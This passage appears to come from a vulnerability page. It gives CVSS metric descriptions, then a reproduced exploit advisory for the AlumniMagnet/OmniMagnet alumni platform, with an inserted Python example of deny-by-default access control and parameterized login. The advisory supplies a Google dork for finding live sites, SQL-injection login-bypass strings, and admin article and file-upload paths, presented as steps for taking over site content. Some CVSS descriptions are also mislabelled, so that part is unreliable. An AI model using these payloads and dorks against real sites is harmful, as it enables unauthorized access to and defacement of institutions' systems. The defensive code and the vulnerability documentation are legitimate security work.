The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity (AC): Low
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required (PR): Low
The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
Scope (S)
An exploited vulnerability can affect resources beyond the security scope managed by the security authority that is managing the vulnerable component. This is often referred to as a 'privilege escalation,' where the attacker can use the exploited vulnerability to gain control of resources that were not intended or authorized.
Confidentiality (C): High
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity (I): High
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability (A): High
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
Below is a copy of the original advisory, AlumniMagnet OmniMagnet Improper Access Control Vulnerability:
####################################################################
# Exploit Title : AlumniMagnet OmniMagnet Improper Access Control Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 18/05/2019
# Vendor Homepage : alumnimagnet.com ~ support.omnimagnet.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:Powered By AlumniMagnet + inurl:/article.html?aid= site:org
# Vulnerability Type : CWE-284 [ Improper Access Control ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
####################################################################
# Description about Software :
***************************
The top alumni associations in the world use AlumniMagnet as their alumni engagement
and volunteer management platform. It is made for large universities and colleges, schools
and their chapters. The Enterprise Edition includes all of the Central features and also
brings in connectivity between the university's alumni office and all of its associated
chapters, classes, and clubs.
####################################################################
# Impact :
***********
The software does not restrict, or incorrectly restricts, access to a resource from
an unauthorized actor.
There are two distinct behaviors that can introduce access control weaknesses:
Specification: incorrect privileges, permissions, ownership, etc. are explicitly specified for
either the user or the resource (for example, setting a password file to be world-writable, or
giving administrator capabilities to a guest user). This action could be performed by
the program or the administrator. As a result, activities that should be carried out only by
the administrator or the program become available to all users.
Enforcement: the mechanism contains errors that prevent it from properly enforcing the
specified access control requirements (e.g., allowing the user to specify their own privileges, or
allowing a syntactically-incorrect ACL to produce insecure settings). This problem occurs
within the program itself, in that it does not actually enforce the intended security
policy that the administrator specifies.
Potential Mitigations
Phases: Architecture and Design; Operation
Very carefully manage the setting, management, and handling of privileges.
Explicitly manage trust zones in the software.
Phase: Architecture and Design
Strategy: Separation of Privilege
Compartmentalize the system to have "safe" areas where trust boundaries can be
unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary
and always be careful when interfacing with a compartment outside of the safe area.
Ensure that appropriate compartmentalization is built into the system design and that
the compartmentalization serves to allow for and further reinforce privilege separation
functionality. Architects and designers should rely on the principle of least privilege
to decide when it is appropriate to use and to drop system privileges.
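The specification/enforcement split and the trust-boundary advice above can be shown in code. What follows is an added example, not OmniMagnet's code: a deny-by-default route policy checked against a server-side session (so the admin_article and admin_files pages are refused to anyone whose session does not carry a staff role), and a parameterized login lookup that treats the e-mail as data, so the quote-laden addresses listed later in the advisory simply fail to match any account. The route list, role names, sample account and credentials are all constructed here.

```python
"""
Deny-by-default authorization plus a parameterized login (added example,
not OmniMagnet code). Routes, roles and the sample user are constructed.
"""
import hashlib
import hmac
import os
import sqlite3
from dataclasses import dataclass
from typing import Optional, Tuple

# Specification side: the minimum role that may reach each page.
# Anything not listed falls through to "staff", so a forgotten entry denies rather than grants.
ROUTE_POLICY = {
    "/article.html": "public",
    "/user.html": "public",
    "/admin_article.html": "staff",
    "/admin_files.html": "staff",
}
ROLE_RANK = {"public": 0, "member": 1, "staff": 2}


@dataclass
class Session:
    """Server-side session. The role is set only by login(), never copied from a request parameter."""
    user_id: Optional[int] = None
    role: str = "public"
    authenticated: bool = False


def authorize(path: str, session: Session) -> Tuple[int, str]:
    """Enforcement side: every request passes through here before any page handler runs."""
    page = path.split("?", 1)[0]          # the query string must not influence the policy lookup
    required = ROUTE_POLICY.get(page, "staff")
    if required == "public":
        return 200, "ok"
    if not session.authenticated:
        return 401, "Make sure you are logged into the system before you proceed."
    if ROLE_RANK.get(session.role, -1) < ROLE_RANK[required]:
        return 403, "The page you requested requires staff clearance."
    return 200, "ok"


def _hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 200_000)


def build_user_db() -> sqlite3.Connection:
    """Constructed in-memory user table with one staff account (sample credentials)."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT UNIQUE, "
        "role TEXT NOT NULL, salt BLOB NOT NULL, pw_hash BLOB NOT NULL)"
    )
    salt = os.urandom(16)
    db.execute(
        "INSERT INTO users (id, email, role, salt, pw_hash) VALUES (?, ?, ?, ?, ?)",
        (1, "staff@example.invalid", "staff", salt,
         _hash_password("correct horse battery staple", salt)),
    )
    return db


def login(db: sqlite3.Connection, email: str, password: str) -> Session:
    """Bound parameters keep the e-mail as data, so quote characters in it never alter the query;
    the password is verified against a salted hash in constant time, never compared inside SQL."""
    row = db.execute(
        "SELECT id, role, salt, pw_hash FROM users WHERE email = ?", (email,)
    ).fetchone()
    if row is None:
        return Session()
    user_id, role, salt, pw_hash = row
    if not hmac.compare_digest(_hash_password(password, salt), pw_hash):
        return Session()
    return Session(user_id=user_id, role=role, authenticated=True)


if __name__ == "__main__":
    db = build_user_db()
    print(authorize("/admin_files.html?sub_op=upload_files", Session()))
    staff = login(db, "staff@example.invalid", "correct horse battery staple")
    print(authorize("/admin_files.html?sub_op=upload_files", staff))
```

The two halves map onto the CWE text: ROUTE_POLICY is the specification, and authorize() is the enforcement that every admin page must pass through on the server, since a page that is merely unlinked from the menu is still reachable by typing its path.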
####################################################################
# Improper Access Control Exploit :
********************************
Non-Alumni Staff Administrator Page Login Path :
*******************************************
/user.html?op=login&non_alum=true
Faculty, Staff, Parents, and Non-Alumni
Members and Guests click here and login below.
Administrator E-Mail Address :
****************************
[email protected]
'or''='@gmail.com
'or''='@yahoo.com
'or''='@hotmail.com
Administrator Password :
***********************
'or''='
' or 1=1 limit 1 -- -+
anything' OR 'x'='x
Usable Admin Control Panel Links :
********************************
We can change the articles on the homepage
without administrator permission.
/admin_article.html
/article.html?aid=[ID-NUMBER]
/admin_article.html?op=edit&aid=[ID-NUMBER]
/admin_files.html
/admin_files.html?sub_op=upload_files
Allowed files: jpg, png, gif, pdf, psd, eps, xls, xlsx, doc, docx, csv, txt, p12
Upload a File. Click Manage Uploads.
At the bottom of the page you can see the link showing where the image is going.
/images/vault/[ID-NUMBER].jpg
Look at File Destination => 'file_dest' => 'images/vault/[ID-NUMBER].jpg',
array (
'captcha' =>
array (
0 => '[RANDOM-ID-NUMBER]',
),
'current_user' => '1',
'current_user_first_name' => 'Magnet',
'current_user_aux_id' => '',
'current_user_permissions' => '[RANDOM-ID-NUMBER]',
'current_user_email' => '[email protected]',
'current_user_nickname' => 'Magnet Team',
'signed_in_at' => '[DOMAIN-ADDRESS-HERE]',
'main_code' => NULL,
'last_update_date' => '[RANDOM-ID-NUMBER]',
'current_user_authenticated' => 'y',
'last_action_requested' => '[DOMAIN-ADDRESS-HERE]/admin_files.html?sub_op=upload_files',
'file_dest' => 'images/vault/[ID-NUMBER].jpg',
Sometimes it gives an error like this; in that case you cannot get an admin account.
************************************
Access denied...
The page you requested requires staff clearance.
Make sure you are logged into the system before you proceed.
If you feel that this is an error, please contact an admin.
Authentication Error
Error code 201
The email/password combination you have entered does not match.
Please check your records and try again.
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################